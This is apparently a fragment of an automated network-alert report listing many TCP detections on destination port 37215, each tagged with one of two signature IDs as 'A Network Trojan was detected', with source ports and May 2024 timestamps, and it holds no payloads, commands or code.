          SID:2829579
          Source Port:57764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.235417
          SID:2829579
          Source Port:55738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.972206
          SID:2835222
          Source Port:39418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594852
          SID:2835222
          Source Port:49590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.622227
          SID:2829579
          Source Port:37990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553100
          SID:2829579
          Source Port:51052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590935
          SID:2835222
          Source Port:35584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324272
          SID:2829579
          Source Port:35478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102820
          SID:2835222
          Source Port:57218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473712
          SID:2835222
          Source Port:51958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973724
          SID:2829579
          Source Port:52638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.672650
          SID:2829579
          Source Port:40950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291764
          SID:2829579
          Source Port:39804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650199
          SID:2835222
          Source Port:56556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102373
          SID:2829579
          Source Port:49842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537419
          SID:2829579
          Source Port:50334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290236
          SID:2829579
          Source Port:58882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591188
          SID:2835222
          Source Port:46084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953337
          SID:2835222
          Source Port:52650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547772
          SID:2835222
          Source Port:33496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.931006
          SID:2829579
          Source Port:44384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.811833
          SID:2829579
          Source Port:41094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147248
          SID:2829579
          Source Port:39364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.008837
          SID:2829579
          Source Port:56554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138101
          SID:2835222
          Source Port:53202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045311
          SID:2835222
          Source Port:37174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724332
          SID:2829579
          Source Port:36192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299535
          SID:2829579
          Source Port:34282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271012
          SID:2835222
          Source Port:47520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.620291
          SID:2835222
          Source Port:36358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852154
          SID:2829579
          Source Port:38304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.035473
          SID:2829579
          Source Port:41194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328598
          SID:2829579
          Source Port:51242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.552441
          SID:2829579
          Source Port:43256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328984
          SID:2835222
          Source Port:35574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965017
          SID:2829579
          Source Port:48912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.129880
          SID:2829579
          Source Port:43154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745851
          SID:2829579
          Source Port:59766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846996
          SID:2829579
          Source Port:34276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.859233
          SID:2835222
          Source Port:57856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299627
          SID:2829579
          Source Port:33164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485241
          SID:2835222
          Source Port:34588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.948619
          SID:2835222
          Source Port:41690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.244644
          SID:2829579
          Source Port:49854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466535
          SID:2835222
          Source Port:52728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.820994
          SID:2829579
          Source Port:50004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338550
          SID:2829579
          Source Port:40866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.602484
          SID:2835222
          Source Port:51138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.062583
          SID:2835222
          Source Port:35252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542377
          SID:2829579
          Source Port:50146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.222569
          SID:2829579
          Source Port:55022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.126863
          SID:2835222
          Source Port:46518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.859061
          SID:2835222
          Source Port:49748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176339
          SID:2829579
          Source Port:39552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846877
          SID:2829579
          Source Port:44942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272728
          SID:2829579
          Source Port:51502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227600
          SID:2835222
          Source Port:40252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202952
          SID:2835222
          Source Port:46354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949305
          SID:2829579
          Source Port:56298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548528
          SID:2829579
          Source Port:59448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328776
          SID:2835222
          Source Port:44256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.089702
          SID:2829579
          Source Port:56856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528836
          SID:2829579
          Source Port:57940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764638
          SID:2829579
          Source Port:60606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764220
          SID:2829579
          Source Port:56746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.725176
          SID:2835222
          Source Port:48390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156487
          SID:2835222
          Source Port:60180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336992
          SID:2835222
          Source Port:38356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.636562
          SID:2829579
          Source Port:46502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.742309
          SID:2835222
          Source Port:52176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657042
          SID:2835222
          Source Port:57372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.984197
          SID:2835222
          Source Port:44614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797803
          SID:2829579
          Source Port:35690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977041
          SID:2829579
          Source Port:52194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266918
          SID:2835222
          Source Port:60760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154733
          SID:2829579
          Source Port:45892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.276309
          SID:2835222
          Source Port:48062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537526
          SID:2835222
          Source Port:55330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764330
          SID:2829579
          Source Port:55540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893573
          SID:2829579
          Source Port:46370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845497
          SID:2835222
          Source Port:59076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.311128
          SID:2829579
          Source Port:48642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183745
          SID:2835222
          Source Port:47110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989717
          SID:2835222
          Source Port:41794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067897
          SID:2829579
          Source Port:44416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818201
          SID:2835222
          Source Port:43902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143066
          SID:2835222
          Source Port:41142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.248080
          SID:2835222
          Source Port:44498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208285
          SID:2829579
          Source Port:47776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.874106
          SID:2829579
          Source Port:58138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.653062
          SID:2829579
          Source Port:47368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847040
          SID:2835222
          Source Port:49762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985137
          SID:2835222
          Source Port:53904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115571
          SID:2835222
          Source Port:51726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.422045
          SID:2835222
          Source Port:34028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464339
          SID:2829579
          Source Port:36890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.627532
          SID:2835222
          Source Port:60392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266605
          SID:2835222
          Source Port:34578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922735
          SID:2829579
          Source Port:55458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338022
          SID:2829579
          Source Port:39742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215928
          SID:2829579
          Source Port:55180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.630034
          SID:2829579
          Source Port:35520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042478
          SID:2835222
          Source Port:35418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.988977
          SID:2829579
          Source Port:57120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266300
          SID:2835222
          Source Port:57450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943150
          SID:2835222
          Source Port:51432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210818
          SID:2829579
          Source Port:45020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846289
          SID:2829579
          Source Port:36354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170547
          SID:2829579
          Source Port:54562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.364855
          SID:2829579
          Source Port:38100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.277676
          SID:2835222
          Source Port:51246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399922
          SID:2829579
          Source Port:48042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770160
          SID:2829579
          Source Port:54132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781088
          SID:2835222
          Source Port:34630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270271
          SID:2835222
          Source Port:60478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745915
          SID:2835222
          Source Port:32872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213140
          SID:2835222
          Source Port:60206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848415
          SID:2835222
          Source Port:49658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738582
          SID:2829579
          Source Port:37164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.850669
          SID:2829579
          Source Port:59254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.153056
          SID:2829579
          Source Port:39902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102284
          SID:2829579
          Source Port:34812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.599038
          SID:2835222
          Source Port:59164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.248613
          SID:2829579
          Source Port:53358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223132
          SID:2835222
          Source Port:38654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103040
          SID:2835222
          Source Port:35458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657096
          SID:2829579
          Source Port:40666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.603046
          SID:2835222
          Source Port:45184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739247
          SID:2835222
          Source Port:46072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.629336
          SID:2829579
          Source Port:40492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.288312
          SID:2835222
          Source Port:57146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922401
          SID:2835222
          Source Port:54954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987469
          SID:2829579
          Source Port:37102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.704750
          SID:2829579
          Source Port:46220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.471172
          SID:2829579
          Source Port:44544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116794
          SID:2835222
          Source Port:49610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325934
          SID:2829579
          Source Port:50222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068475
          SID:2835222
          Source Port:44072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.535835
          SID:2829579
          Source Port:54074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593037
          SID:2835222
          Source Port:47690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513715
          SID:2835222
          Source Port:37412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156220
          SID:2835222
          Source Port:48768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.617499
          SID:2829579
          Source Port:56374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.978948
          SID:2829579
          Source Port:50130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.923848
          SID:2835222
          Source Port:39186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.970543
          SID:2835222
          Source Port:59326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039501
          SID:2835222
          Source Port:33206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.180257
          SID:2835222
          Source Port:46006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741519
          SID:2829579
          Source Port:39174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221174
          SID:2835222
          Source Port:45060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232644
          SID:2835222
          Source Port:39338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.803770
          SID:2829579
          Source Port:36374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.219253
          SID:2835222
          Source Port:52802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652366
          SID:2829579
          Source Port:33638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542164
          SID:2829579
          Source Port:35502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268680
          SID:2829579
          Source Port:50936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.230986
          SID:2829579
          Source Port:41854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178513
          SID:2829579
          Source Port:48700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668862
          SID:2829579
          Source Port:39984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273298
          SID:2835222
          Source Port:49630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943425
          SID:2829579
          Source Port:59900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.059665
          SID:2835222
          Source Port:35112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.814093
          SID:2835222
          Source Port:56574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793274
          SID:2829579
          Source Port:53210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793404
          SID:2835222
          Source Port:53670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.857232
          SID:2835222
          Source Port:49018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183817
          SID:2835222
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.610313
          SID:2835222
          Source Port:40352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.430153
          SID:2829579
          Source Port:34854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767010
          SID:2835222
          Source Port:33664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.721988
          SID:2835222
          Source Port:43840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960657
          SID:2829579
          Source Port:34676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818977
          SID:2835222
          Source Port:56058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709099
          SID:2829579
          Source Port:57560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651520
          SID:2835222
          Source Port:38008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.236896
          SID:2829579
          Source Port:43152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794209
          SID:2835222
          Source Port:55428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.080846
          SID:2835222
          Source Port:45886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.848155
          SID:2835222
          Source Port:38724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594495
          SID:2835222
          Source Port:57838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084210
          SID:2829579
          Source Port:40524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.236577
          SID:2835222
          Source Port:49526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268359
          SID:2829579
          Source Port:55092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178086
          SID:2829579
          Source Port:48022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.079538
          SID:2829579
          Source Port:51176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.151211
          SID:2829579
          Source Port:37672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760241
          SID:2835222
          Source Port:51968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893554
          SID:2829579
          Source Port:42236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117006
          SID:2835222
          Source Port:47388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.331551
          SID:2829579
          Source Port:59620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843354
          SID:2835222
          Source Port:47048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266245
          SID:2835222
          Source Port:46600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543563
          SID:2835222
          Source Port:37092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.816671
          SID:2835222
          Source Port:36302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846874
          SID:2829579
          Source Port:42130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197996
          SID:2829579
          Source Port:59684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.227241
          SID:2829579
          Source Port:53612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848420
          SID:2835222
          Source Port:47650
          Destination Port:37215
